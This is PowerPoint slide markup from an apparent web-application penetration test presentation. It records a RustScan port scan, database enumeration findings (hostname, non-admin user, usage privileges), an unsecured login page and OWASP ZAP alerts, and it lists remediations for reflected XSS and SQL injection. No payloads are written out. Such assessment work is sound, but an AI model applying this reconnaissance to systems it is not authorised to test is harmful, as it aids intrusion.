                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Hostname = psmysql349196</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User is not database administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Privileges is usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D60FC4-F342-5C23-97D4-7E7A91B23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467" y="1288992"/>
            <a:ext cx="8707065" cy="3391373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475535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sz="2800" dirty="0"/>
              <a:t>Queries - Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A643297A-EB1F-DBBD-3255-4E74D28BB85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332780" y="4745864"/>
            <a:ext cx="11238885" cy="18846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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D86CD09-CDA3-C538-F588-2AFC69BF1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901" y="1600931"/>
            <a:ext cx="10658198" cy="3023530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264798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dirty="0"/>
              <a:t>Login Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC7B845-323E-77A7-CAF1-E0AAD2E55EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987839" y="1476728"/>
            <a:ext cx="9813200" cy="46736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2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64D5E6E-3B0A-E21B-3D58-828CA9075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4514" y="1530734"/>
            <a:ext cx="8437822" cy="4390304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF23DCA-DD11-0D7B-97CF-1E7991E1A4ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841722" y="5921038"/>
            <a:ext cx="6742047" cy="22394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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Unsecured</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191757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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3111641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sz="2800" dirty="0" err="1"/>
              <a:t>RustScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – Port scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ports 80 and 443 are open.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{786D4BE7-F458-051F-97B4-A75C5733F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1470" y="1655239"/>
            <a:ext cx="6736395" cy="3831325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1124035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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do we fix this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791526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sz="2800" dirty="0"/>
              <a:t>XSS (Reflected Cross Site Scripting)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180380" y="2000168"/>
            <a:ext cx="11037117" cy="44779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en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Filtering input on arrival</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Properly escaping user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizing user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Validating inputs (whitelisting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoding data on output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Using appropriate response headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Template engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> built-in function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Quick and easy) Using verified libraries that prevent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Security Policies – last case, only limits what they can do but does not necessarily prevent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3384088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sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180380" y="2000168"/>
            <a:ext cx="11037117" cy="44779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en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always used prepared statements (parametrized queries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object relational mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use properly constructed stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizing all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allow-list input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping all user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Third party authentication (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API’s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password hashing (strong, one-way, salted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Least privilege principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2799777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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP ZAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185558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dirty="0"/>
              <a:t>OWASP Automated Scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32FE12ED-DE9E-F1F3-F57A-665FAF9E5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8586" y="1661676"/>
            <a:ext cx="6334827" cy="4307682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3221875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dirty="0"/>
              <a:t>Alerts found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC7B845-323E-77A7-CAF1-E0AAD2E55EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987839" y="1476728"/>
            <a:ext cx="9813200" cy="46736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endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF23DCA-DD11-0D7B-97CF-1E7991E1A4ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841722" y="5921038"/>
            <a:ext cx="6742047" cy="22394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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12 Alerts: 2 High, 3 Medium, 6 Low, 1 Informational</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E996B77E-B63A-C2E9-D959-75FBA14EF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377" y="1410213"/>
            <a:ext cx="8019245" cy="4510825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1838565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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3402718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18B54-2089-2FDF-1EA8-670067B2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected Cross Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549EEAA2-099D-29DB-09A7-2DF561D1F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7245" y="1480238"/>
            <a:ext cx="3994013" cy="4444043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
